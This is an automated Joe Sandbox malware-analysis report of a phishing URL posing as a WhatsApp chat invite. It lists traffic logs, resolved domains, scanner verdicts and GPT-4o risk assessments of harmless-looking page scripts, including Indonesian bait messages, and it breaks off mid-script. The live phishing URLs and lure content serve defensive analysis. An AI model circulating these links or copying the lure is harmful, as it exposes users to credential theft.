Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Mon, 27 May 2024 22:30:16 GMTContent-Type: text/html; charset=iso-8859-1Transfer-Encoding: chunkedConnection: closeCache-Control: max-age=14400CF-Cache-Status: EXPIREDReport-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=k8orVNajS4IY7F%2FrPW0XcB5jHmiIKq0gQDnMtAlse%2Fn%2FYghTjtVg2Bea1bw6URON27xqbur1Yd9jzFQyLUsDB8pfL%2FynfPy7y1r3LM3R%2BacDnmOX1mdFhekap2Fj92rvbOdMU9Y7AocSzSal8Vw%3D"}],"group":"cf-nel","max_age":604800}NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}Server: cloudflareCF-RAY: 88a972d0df4b7c99-EWRalt-svc: h3=":443"; ma=86400
Source: chromecache_133.1.drString found in binary or memory: http://fontawesome.io
Source: chromecache_133.1.drString found in binary or memory: http://fontawesome.io/license
Source: chromecache_147.1.drString found in binary or memory: https://fonts.gstatic.com/s/roboto/v30/KFOlCnqEu92Fr1MmSU5fABc4EsA.woff2)
Source: chromecache_147.1.drString found in binary or memory: https://fonts.gstatic.com/s/roboto/v30/KFOlCnqEu92Fr1MmSU5fBBc4.woff2)
Source: chromecache_147.1.drString found in binary or memory: https://fonts.gstatic.com/s/roboto/v30/KFOlCnqEu92Fr1MmSU5fBxc4EsA.woff2)
Source: chromecache_147.1.drString found in binary or memory: https://fonts.gstatic.com/s/roboto/v30/KFOlCnqEu92Fr1MmSU5fCBc4EsA.woff2)
Source: chromecache_147.1.drString found in binary or memory: https://fonts.gstatic.com/s/roboto/v30/KFOlCnqEu92Fr1MmSU5fCRc4EsA.woff2)
Source: chromecache_147.1.drString found in binary or memory: https://fonts.gstatic.com/s/roboto/v30/KFOlCnqEu92Fr1MmSU5fChc4EsA.woff2)
Source: chromecache_147.1.drString found in binary or memory: https://fonts.gstatic.com/s/roboto/v30/KFOlCnqEu92Fr1MmSU5fCxc4EsA.woff2)
Source: chromecache_147.1.drString found in binary or memory: https://fonts.gstatic.com/s/roboto/v30/KFOlCnqEu92Fr1MmWUlfABc4EsA.woff2)
Source: chromecache_147.1.drString found in binary or memory: https://fonts.gstatic.com/s/roboto/v30/KFOlCnqEu92Fr1MmWUlfBBc4.woff2)
Source: chromecache_147.1.drString found in binary or memory: https://fonts.gstatic.com/s/roboto/v30/KFOlCnqEu92Fr1MmWUlfBxc4EsA.woff2)
Source: chromecache_147.1.drString found in binary or memory: https://fonts.gstatic.com/s/roboto/v30/KFOlCnqEu92Fr1MmWUlfCBc4EsA.woff2)
Source: chromecache_147.1.drString found in binary or memory: https://fonts.gstatic.com/s/roboto/v30/KFOlCnqEu92Fr1MmWUlfCRc4EsA.woff2)
Source: chromecache_147.1.drString found in binary or memory: https://fonts.gstatic.com/s/roboto/v30/KFOlCnqEu92Fr1MmWUlfChc4EsA.woff2)
Source: chromecache_147.1.drString found in binary or memory: https://fonts.gstatic.com/s/roboto/v30/KFOlCnqEu92Fr1MmWUlfCxc4EsA.woff2)
Source: chromecache_147.1.drString found in binary or memory: https://fonts.gstatic.com/s/roboto/v30/KFOmCnqEu92Fr1Mu4WxKOzY.woff2)
Source: chromecache_147.1.drString found in binary or memory: https://fonts.gstatic.com/s/roboto/v30/KFOmCnqEu92Fr1Mu4mxK.woff2)
Source: chromecache_147.1.drString found in binary or memory: https://fonts.gstatic.com/s/roboto/v30/KFOmCnqEu92Fr1Mu5mxKOzY.woff2)
Source: chromecache_147.1.drString found in binary or memory: https://fonts.gstatic.com/s/roboto/v30/KFOmCnqEu92Fr1Mu72xKOzY.woff2)
Source: chromecache_147.1.drString found in binary or memory: https://fonts.gstatic.com/s/roboto/v30/KFOmCnqEu92Fr1Mu7GxKOzY.woff2)
Source: chromecache_147.1.drString found in binary or memory: https://fonts.gstatic.com/s/roboto/v30/KFOmCnqEu92Fr1Mu7WxKOzY.woff2)
Source: chromecache_147.1.drString found in binary or memory: https://fonts.gstatic.com/s/roboto/v30/KFOmCnqEu92Fr1Mu7mxKOzY.woff2)
Source: chromecache_135.1.drString found in binary or memory: https://fonts.gstatic.com/s/yantramanav/v13/flU8Rqu5zY00QEpyWJYWN5f9XeZhCQ.woff2)
Source: chromecache_135.1.drString found in binary or memory: https://fonts.gstatic.com/s/yantramanav/v13/flU8Rqu5zY00QEpyWJYWN5fyXeZhCQ.woff2)
Source: chromecache_135.1.drString found in binary or memory: https://fonts.gstatic.com/s/yantramanav/v13/flU8Rqu5zY00QEpyWJYWN5fzXeY.woff2)
Source: chromecache_125.1.drString found in binary or memory: https://www.jsdelivr.com/using-sri-with-dynamic-files
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49744
Source: unknownNetwork traffic detected: HTTP traffic on port 63839 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49766 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49762 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49746 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49769 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49739
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49738
Source: unknownNetwork traffic detected: HTTP traffic on port 63840 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 63841
Source: unknownNetwork traffic detected: HTTP traffic on port 49759 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 63840
Source: unknownNetwork traffic detected: HTTP traffic on port 49753 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49735
Source: unknownNetwork traffic detected: HTTP traffic on port 49675 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49774
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49773
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49771
Source: unknownNetwork traffic detected: HTTP traffic on port 63838 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49767 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49749 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49763 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49752 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 63841 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49773 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49735 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49769
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49768
Source: unknownNetwork traffic detected: HTTP traffic on port 49739 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49756 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49767
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49766
Source: unknownNetwork traffic detected: HTTP traffic on port 49758 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49765
Source: unknownNetwork traffic detected: HTTP traffic on port 63837 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49764
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49763
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49762
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49761
Source: unknownNetwork traffic detected: HTTP traffic on port 49678 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49764 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49745 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49751 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49759
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49758
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49757
Source: unknownNetwork traffic detected: HTTP traffic on port 49774 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49738 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49755 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49756
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49755
Source: unknownNetwork traffic detected: HTTP traffic on port 49757 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49754
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49753
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49752
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49751
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49750
Source: unknownNetwork traffic detected: HTTP traffic on port 49761 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49765 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49747 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49744 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49768 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 63838
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 63837
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 63839
Source: unknownNetwork traffic detected: HTTP traffic on port 49750 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49749
Source: unknownNetwork traffic detected: HTTP traffic on port 49754 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49747
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49746
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49745
Source: unknownNetwork traffic detected: HTTP traffic on port 49771 -> 443
Source: unknownHTTPS traffic detected: 184.28.90.27:443 -> 192.168.2.4:49749 version: TLS 1.2
Source: unknownHTTPS traffic detected: 184.28.90.27:443 -> 192.168.2.4:49764 version: TLS 1.2
Source: classification engineClassification label: mal60.phis.win@22/49@26/12
Source: unknownProcess created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" --start-maximized "about:blank"
Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2104 --field-trial-handle=2016,i,6664779081059254972,7231676484794704864,262144 --disable-features=OptimizationGuideModelDownloading,OptimizationHints,OptimizationHintsFetching,OptimizationTargetPrediction /prefetch:8
Source: unknownProcess created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" "http://joinchat8g7135b.12trm.my.id/vhsfhqpdhdsih6/"
Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2104 --field-trial-handle=2016,i,6664779081059254972,7231676484794704864,262144 --disable-features=OptimizationGuideModelDownloading,OptimizationHints,OptimizationHintsFetching,OptimizationTargetPrediction /prefetch:8Jump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
Source: Window RecorderWindow detected: More than 3 window changes detected
ReconnaissanceResource DevelopmentInitial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionCommand and ControlExfiltrationImpact
Gather Victim Identity InformationAcquire InfrastructureValid AccountsWindows Management InstrumentationPath Interception1
Process Injection
1
Process Injection
OS Credential DumpingSystem Service DiscoveryRemote ServicesData from Local System1
Encrypted Channel
Exfiltration Over Other Network MediumAbuse Accessibility Features
CredentialsDomainsDefault AccountsScheduled Task/JobBoot or Logon Initialization ScriptsBoot or Logon Initialization ScriptsRootkitLSASS MemoryApplication Window DiscoveryRemote Desktop ProtocolData from Removable Media4
Non-Application Layer Protocol
Exfiltration Over BluetoothNetwork Denial of Service
Email AddressesDNS ServerDomain AccountsAtLogon Script (Windows)Logon Script (Windows)Obfuscated Files or InformationSecurity Account ManagerQuery RegistrySMB/Windows Admin SharesData from Network Shared Drive5
Application Layer Protocol
Automated ExfiltrationData Encrypted for Impact
Employee NamesVirtual Private ServerLocal AccountsCronLogin HookLogin HookBinary PaddingNTDSSystem Network Configuration DiscoveryDistributed Component Object ModelInput Capture3
Ingress Tool Transfer
Traffic DuplicationData Destruction
Hide Legend

Legend:

  • Process
  • Signature
  • Created File
  • DNS/IP Info
  • Is Dropped
  • Is Windows Process
  • Number of created Registry Values
  • Number of created Files
  • Visual Basic
  • Delphi
  • Java
  • .Net C# or VB.NET
  • C, C++ or other language
  • Is malicious
  • Internet

This section contains all screenshots as thumbnails, including those not shown in the slideshow.


windows-stand
SourceDetectionScannerLabelLink
http://joinchat8g7135b.12trm.my.id/vhsfhqpdhdsih6/100%Avira URL Cloudphishing
http://joinchat8g7135b.12trm.my.id/vhsfhqpdhdsih6/100%SlashNextFraudulent Website type: Phishing & Social Engineering
No Antivirus matches
No Antivirus matches
No Antivirus matches
SourceDetectionScannerLabelLink
http://fontawesome.io0%URL Reputationsafe
https://www.jsdelivr.com/using-sri-with-dynamic-files0%URL Reputationsafe
https://cdnjs.cloudflare.com/ajax/libs/font-awesome/4.7.0/css/font-awesome.min.css0%URL Reputationsafe
http://fontawesome.io/license0%URL Reputationsafe
https://cdnjs.cloudflare.com/ajax/libs/material-design-iconic-font/2.1.2/css/material-design-iconic-font.min.css0%Avira URL Cloudsafe
https://joinchat8g7135b.12trm.my.id/vhsfhqpdhdsih6/img/logowa.png100%Avira URL Cloudphishing
https://cloud.githubusercontent.com/assets/398893/15136779/4e765036-1639-11e6-9201-67e728e86f39.jpg0%Avira URL Cloudsafe
https://www.starratings.com.au/assets/img/loading.gif0%Avira URL Cloudsafe
https://joinchat8g7135b.12trm.my.id/vhsfhqpdhdsih6/img/fb-login.png100%Avira URL Cloudphishing
https://rawcdn.githack.com/AlexHostX/all.asset/38984972fb20a70d711e86ac3e6f19e60ea8adc3/AlexHostWA.ttf0%Avira URL Cloudsafe
https://rawcdn.githack.com/AlexHostX/all.asset/c529c239acac01cd8bc1a76f349f7c3caebba766/580b57fcd9996e24bc43c543.png0%Avira URL Cloudsafe
https://joinchat8g7135b.12trm.my.id/vhsfhqpdhdsih6/img/01.jpg100%Avira URL Cloudphishing
https://a.nel.cloudflare.com/report/v4?s=c6RIc6ACdz56YDTQYa5xnbXhr9YhF6DxZf3AhdLSysB4jl5fj%2Bnfoy3ilwZDPm4J8c3zapAM0wZUUiHjRn0eSF1g4t8Kiui7%2FOXI83DChGjxdJh%2BZlYB4mgfDWuddcZTPndrniYnq1BCAxjddQg%3D0%Avira URL Cloudsafe
https://rawcdn.githack.com/AlexHostX/protect/a64076479559076b6e31356a0fb6188d291204ce/watermark.css0%Avira URL Cloudsafe
https://joinchat8g7135b.12trm.my.id/vhsfhqpdhdsih6/img/maria.jpg100%Avira URL Cloudphishing
https://joinchat8g7135b.12trm.my.id/vhsfhqpdhdsih6/img/bahan1.jpg100%Avira URL Cloudphishing
https://raw.githubusercontent.com/AlexHostX/all.asset/c529c239acac01cd8bc1a76f349f7c3caebba766/580b57fcd9996e24bc43c543.png0%Avira URL Cloudsafe
https://cdnjs.cloudflare.com/ajax/libs/moment.js/2.13.0/moment.min.js0%Avira URL Cloudsafe
https://joinchat8g7135b.12trm.my.id/vhsfhqpdhdsih6/img/jquery.min.js100%Avira URL Cloudphishing
https://a.nel.cloudflare.com/report/v4?s=oUTLFvZiTMRAoK3Q93kizLBJ0hjl6jJKmwAUq%2ByJgtbCAC5MaNw%2BrPwdruGI22QcS0CFWdFYPpq3vlpyyniKdBb5IgK7XY3Bq2JL7ttD8hM0RFcCBZWo9Btb9hnLcuGWqiOI5ug%3D0%Avira URL Cloudsafe
https://cdnjs.cloudflare.com/ajax/libs/material-design-iconic-font/2.1.2/fonts/Material-Design-Iconic-Font.woff2?v=2.1.00%Avira URL Cloudsafe
NameIPActiveMaliciousAntivirus DetectionReputation
rawcdn.githack.com
104.21.234.230
truefalse
    unknown
    bg.microsoft.map.fastly.net
    199.232.210.172
    truefalse
      unknown
      cloud.githubusercontent.com
      185.199.110.133
      truefalse
        unknown
        a.nel.cloudflare.com
        35.190.80.1
        truefalse
          unknown
          cdnjs.cloudflare.com
          104.17.24.14
          truefalse
            unknown
            raw.githubusercontent.com
            185.199.108.133
            truefalse
              unknown
              www.google.com
              142.250.184.196
              truefalse
                unknown
                joinchat8g7135b.12trm.my.id
                188.114.96.3
                truefalse
                  unknown
                  www.starratings.com.au
                  54.252.28.172
                  truefalse
                    unknown
                    fp2e7a.wpc.phicdn.net
                    192.229.221.95
                    truefalse
                      unknown
                      cdn.jsdelivr.net
                      unknown
                      unknownfalse
                        unknown
                        NameMaliciousAntivirus DetectionReputation
                        https://joinchat8g7135b.12trm.my.id/vhsfhqpdhdsih6/img/logowa.pngfalse
                        • Avira URL Cloud: phishing
                        unknown
                        https://joinchat8g7135b.12trm.my.id/vhsfhqpdhdsih6/true
                          unknown
                          https://joinchat8g7135b.12trm.my.id/vhsfhqpdhdsih6/img/fb-login.pngfalse
                          • Avira URL Cloud: phishing
                          unknown
                          https://joinchat8g7135b.12trm.my.id/vhsfhqpdhdsih6/img/01.jpgfalse
                          • Avira URL Cloud: phishing
                          unknown
                          https://cdnjs.cloudflare.com/ajax/libs/material-design-iconic-font/2.1.2/css/material-design-iconic-font.min.cssfalse
                          • Avira URL Cloud: safe
                          unknown
                          https://cdnjs.cloudflare.com/ajax/libs/font-awesome/4.7.0/css/font-awesome.min.cssfalse
                          • URL Reputation: safe
                          unknown
                          https://cloud.githubusercontent.com/assets/398893/15136779/4e765036-1639-11e6-9201-67e728e86f39.jpgfalse
                          • Avira URL Cloud: safe
                          unknown
                          https://www.starratings.com.au/assets/img/loading.giffalse
                          • Avira URL Cloud: safe
                          unknown
                          https://rawcdn.githack.com/AlexHostX/all.asset/c529c239acac01cd8bc1a76f349f7c3caebba766/580b57fcd9996e24bc43c543.pngfalse
                          • Avira URL Cloud: safe
                          unknown
                          https://rawcdn.githack.com/AlexHostX/all.asset/38984972fb20a70d711e86ac3e6f19e60ea8adc3/AlexHostWA.ttffalse
                          • Avira URL Cloud: safe
                          unknown
                          https://a.nel.cloudflare.com/report/v4?s=c6RIc6ACdz56YDTQYa5xnbXhr9YhF6DxZf3AhdLSysB4jl5fj%2Bnfoy3ilwZDPm4J8c3zapAM0wZUUiHjRn0eSF1g4t8Kiui7%2FOXI83DChGjxdJh%2BZlYB4mgfDWuddcZTPndrniYnq1BCAxjddQg%3Dfalse
                          • Avira URL Cloud: safe
                          unknown
                          https://rawcdn.githack.com/AlexHostX/protect/a64076479559076b6e31356a0fb6188d291204ce/watermark.cssfalse
                          • Avira URL Cloud: safe
                          unknown
                          https://raw.githubusercontent.com/AlexHostX/all.asset/c529c239acac01cd8bc1a76f349f7c3caebba766/580b57fcd9996e24bc43c543.pngfalse
                          • Avira URL Cloud: safe
                          unknown
                          https://joinchat8g7135b.12trm.my.id/vhsfhqpdhdsih6/img/maria.jpgfalse
                          • Avira URL Cloud: phishing
                          unknown
                          https://joinchat8g7135b.12trm.my.id/vhsfhqpdhdsih6/img/bahan1.jpgfalse
                          • Avira URL Cloud: phishing
                          unknown
                          https://cdnjs.cloudflare.com/ajax/libs/moment.js/2.13.0/moment.min.jsfalse
                          • Avira URL Cloud: safe
                          unknown
                          https://a.nel.cloudflare.com/report/v4?s=oUTLFvZiTMRAoK3Q93kizLBJ0hjl6jJKmwAUq%2ByJgtbCAC5MaNw%2BrPwdruGI22QcS0CFWdFYPpq3vlpyyniKdBb5IgK7XY3Bq2JL7ttD8hM0RFcCBZWo9Btb9hnLcuGWqiOI5ug%3Dfalse
                          • Avira URL Cloud: safe
                          unknown
                          https://joinchat8g7135b.12trm.my.id/vhsfhqpdhdsih6/img/jquery.min.jsfalse
                          • Avira URL Cloud: phishing
                          unknown
                          https://cdnjs.cloudflare.com/ajax/libs/material-design-iconic-font/2.1.2/fonts/Material-Design-Iconic-Font.woff2?v=2.1.0false
                          • Avira URL Cloud: safe
                          unknown
                          NameSourceMaliciousAntivirus DetectionReputation
                          http://fontawesome.iochromecache_133.1.drfalse
                          • URL Reputation: safe
                          unknown
                          https://www.jsdelivr.com/using-sri-with-dynamic-fileschromecache_125.1.drfalse
                          • URL Reputation: safe
                          unknown
                          http://fontawesome.io/licensechromecache_133.1.drfalse
                          • URL Reputation: safe
                          unknown
                          • No. of IPs < 25%
                          • 25% < No. of IPs < 50%
                          • 50% < No. of IPs < 75%
                          • 75% < No. of IPs
                          IPDomainCountryFlagASNASN NameMalicious
                          104.17.24.14
                          cdnjs.cloudflare.comUnited States
                          13335CLOUDFLARENETUSfalse
                          142.250.184.196
                          www.google.comUnited States
                          15169GOOGLEUSfalse
                          239.255.255.250
                          unknownReserved
                          unknownunknownfalse
                          188.114.97.3
                          unknownEuropean Union
                          13335CLOUDFLARENETUSfalse
                          54.252.28.172
                          www.starratings.com.auUnited States
                          16509AMAZON-02USfalse
                          104.21.234.230
                          rawcdn.githack.comUnited States
                          13335CLOUDFLARENETUSfalse
                          188.114.96.3
                          joinchat8g7135b.12trm.my.idEuropean Union
                          13335CLOUDFLARENETUSfalse
                          185.199.108.133
                          raw.githubusercontent.comNetherlands
                          54113FASTLYUSfalse
                          35.190.80.1
                          a.nel.cloudflare.comUnited States
                          15169GOOGLEUSfalse
                          185.199.110.133
                          cloud.githubusercontent.comNetherlands
                          54113FASTLYUSfalse
                          IP
                          192.168.2.4
                          192.168.2.6
                          Joe Sandbox version:40.0.0 Tourmaline
                          Analysis ID:1448160
                          Start date and time:2024-05-28 00:29:21 +02:00
                          Joe Sandbox product:CloudBasic
                          Overall analysis duration:0h 3m 17s
                          Hypervisor based Inspection enabled:false
                          Report type:full
                          Cookbook file name:browseurl.jbs
                          Sample URL:http://joinchat8g7135b.12trm.my.id/vhsfhqpdhdsih6/
                          Analysis system description:Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
                          Number of analysed new started processes analysed:8
                          Number of new started drivers analysed:0
                          Number of existing processes analysed:0
                          Number of existing drivers analysed:0
                          Number of injected processes analysed:0
                          Technologies:
                          • HCA enabled
                          • EGA enabled
                          • AMSI enabled
                          Analysis Mode:default
                          Analysis stop reason:Timeout
                          Detection:MAL
                          Classification:mal60.phis.win@22/49@26/12
                          EGA Information:Failed
                          HCA Information:
                          • Successful, ratio: 100%
                          • Number of executed functions: 0
                          • Number of non-executed functions: 0
                          • Exclude process from analysis (whitelisted): MpCmdRun.exe, WMIADAP.exe, SIHClient.exe, conhost.exe, svchost.exe
                          • Excluded IPs from analysis (whitelisted): 142.250.185.195, 142.250.184.206, 64.233.184.84, 34.104.35.123, 104.18.186.31, 104.18.187.31, 142.250.74.202, 216.58.206.67, 142.250.185.106, 216.58.206.42, 142.250.186.138, 142.250.186.170, 142.250.185.74, 142.250.185.234, 142.250.186.106, 142.250.185.170, 142.250.181.234, 216.58.206.74, 142.250.184.234, 172.217.18.106, 172.217.16.202, 216.58.212.138, 142.250.185.138, 142.250.185.202, 52.165.165.26, 199.232.210.172, 192.229.221.95, 13.85.23.206, 142.250.181.227
                          • Excluded domains from analysis (whitelisted): cdn.jsdelivr.net.cdn.cloudflare.net, fonts.googleapis.com, fs.microsoft.com, accounts.google.com, content-autofill.googleapis.com, fonts.gstatic.com, slscr.update.microsoft.com, ctldl.windowsupdate.com.delivery.microsoft.com, clientservices.googleapis.com, ctldl.windowsupdate.com, fe3cr.delivery.mp.microsoft.com, fe3.delivery.mp.microsoft.com, clients2.google.com, edgedl.me.gvt1.com, ocsp.digicert.com, ocsp.edge.digicert.com, glb.cws.prod.dcat.dsp.trafficmanager.net, sls.update.microsoft.com, update.googleapis.com, clients.l.google.com, wu-b-net.trafficmanager.net, glb.sls.prod.dcat.dsp.trafficmanager.net
                          • HTTPS proxy raw data packets have been limited to 10 per session. Please view the PCAPs for the complete data.
                          • Not all processes where analyzed, report is missing behavior information
                          • Report size getting too big, too many NtSetInformationFile calls found.
                          • VT rate limit hit for: http://joinchat8g7135b.12trm.my.id/vhsfhqpdhdsih6/
                          No simulations
                          InputOutput
                          URL: https://joinchat8g7135b.12trm.my.id/vhsfhqpdhdsih6/ Model: gpt-4o
                          ```json
                          {
                            "riskscore": 1,
                            "reasons": "The code dynamically generates random numbers and assigns them to HTML elements. This behavior is generally low risk and does not indicate any malicious activity. However, it is always good to verify the context in which this code is used."
                          }
                          document.getElementById("nomerAlexHost1").innerHTML =
                          Math.floor(Math.random() * 9000) + 1000;
                          document.getElementById("nomerAlexHost2").innerHTML =
                          Math.floor(Math.random() * 9000) + 1000;
                          document.getElementById("nomerAlexHost3").innerHTML =
                          Math.floor(Math.random() * 9000) + 1000;
                          document.getElementById("nomerAlexHost4").innerHTML =
                          Math.floor(Math.random() * 9000) + 1000;
                          URL: https://joinchat8g7135b.12trm.my.id/vhsfhqpdhdsih6/ Model: gpt-4o
                          ```json
                          {
                            "riskscore": 0,
                            "reasons": "The provided JavaScript code is benign. It simply selects a random string from a predefined array of memes and displays it in an HTML element with the ID 'random'. There are no indications of malicious behavior such as data exfiltration, credential theft, or unauthorized access."
                          }
                          /* Meme */
                          
                          var memes = [
                          'banyak banget vdionya, sampai memoriku full',
                          'nanti saya kirim yg baru, saya masih nonton vdionya',
                          'yang cewe chat aku dong',
                          'baru join memori dah full jirr',
                          'Males gw yang barat, bagusan asia wkwkwk'];
                          
                          
                          var random = document.querySelector('#random');
                          
                          random.innerHTML = memes[Math.floor(Math.random() * memes.length)];
                          URL: https://joinchat8g7135b.12trm.my.id/vhsfhqpdhdsih6/ Model: gpt-4o
                          ```json
                          {
                            "riskscore": 0,
                            "reasons": "The provided JavaScript code appears to be related to a chat or messaging interface. It handles the display of message times, submission of new messages, and some basic animations. There is no indication of malicious behavior such as data exfiltration, credential harvesting, or unauthorized access. The code is focused on user interface functionality and does not pose any security risks."
                          }
                          /* Time */
                          
                          var messageTime = document.querySelectorAll('.message .time');
                          
                          
                          setInterval(function () {
                          
                          }, 1000);
                          
                          for (var i = 0; i < messageTime.length; i++) {
                            messageTime[i].innerHTML = moment().format('h:mm A');
                          }
                          
                          /* Message */
                          
                          var form = document.querySelector('.conversation-compose');
                          var conversation = document.querySelector('.conversation-container');
                          
                          form.addEventListener('submit', newMessage);
                          
                          function newMessage(e) {
                            var input = e.target.input;
                          
                            if (input.value) {
                              var message = buildMessage(input.value);
                              conversation.appendChild(message);
                              animateMessage(message);
                            }
                          
                            input.value = '';
                            conversation.scrollTop = conversation.scrollHeight;
                          
                            e.preventDefault();
                          }
                          
                          function buildMessage(text) {
                            var element = document.createElement('div');
                          
                            element.classList.add('message', 'sent');
                          
                            element.innerHTML = text +
                            '<span class="metadata">' +
                            '<span class="time">' + moment().format('h:mm A') + '</span>' +
                            '<span class="tick tick-animation">' +
                            '<svg xmlns="http://www.w3.org/2000/svg" width="16" height="15" id="msg-dblcheck" x="2047" y="2061"><path d="M15.01 3.316l-.478-.372a.365.365 0 0 0-.51.063L8.666 9.88a.32.32 0 0 1-.484.032l-.358-.325a.32.32 0 0 0-.484.032l-.378.48a.418.418 0 0 0 .036.54l1.32 1.267a.32.32 0 0 0 .484-.034l6.272-8.048a.366.366 0 0 0-.064-.512zm-4.1 0l-.478-.372a.365.365 0 0 0-.51.063L4.566 9.88a.32.32 0 0 1-.484.032L1.892 7.77a.366.366 0 0 0-.516.005l-.423.433a.364.364 0 0 0 .006.514l3.255 3.185a.32.32 0 0 0 .484-.033l6.272-8.048a.365.365 0 0 0-.063-.51z" fill="#92a58c"/></svg>' +
